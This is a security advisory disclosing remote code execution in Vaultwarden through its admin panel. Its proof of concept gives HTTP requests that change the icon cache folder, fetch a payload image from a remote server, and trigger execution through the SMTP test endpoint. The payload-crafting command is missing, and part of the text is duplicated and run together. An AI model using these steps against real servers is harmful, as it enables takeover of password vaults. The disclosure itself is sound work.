Summary
Attacker with authenticated access to the vaultwarden admin panel can execute arbitrary code in the system.
PoC
Specify settings as shown below on the image.
Then set read-only option Icon cache folder by sending POST /admin/config request manually:
POST /admin/config HTTP/1.1
Host: 127.0.0.1:8001
Content-Type: application/json
Cookie: VW_ADMIN=
{
...
"icon_cache_folder":"/@icon"
}
Execute following command for craft payload:
After that serve image on remote server with name apple-touch-icon.png or favicon.ico.
Download it on vaultwarden host by GET /icons/site.com/icon.png request.
We can see @icon directory and site.com.png file on the vaultwarden host.
Finally, make an http request to execute code
POST /admin/test/smtp HTTP/1.1
Host: 127.0.0.1:8001
Cookie: VW_ADMIN=<JWT>
{"email":"[email protected]"}
ElizarBatin Reporter
BlackDex Remediation developer
dani-garcia Remediation reviewer
Summary
Attacker with authenticated access to the vaultwarden admin panel can execute arbitrary code in the system.
PoC
Specify settings as shown below on the image.
Then set read-only option Icon cache folder by sending POST /admin/config request manually:
POST /admin/config HTTP/1.1
Host: 127.0.0.1:8001
Content-Type: application/json
Cookie: VW_ADMIN=
Execute following command for craft payload:
After that serve image on remote server with name
apple-touch-icon.pngorfavicon.ico.Download it on vaultwarden host by
GET /icons/site.com/icon.pngrequest.We can see
@icondirectory andsite.com.pngfile on the vaultwarden host.Finally, make an http request to execute code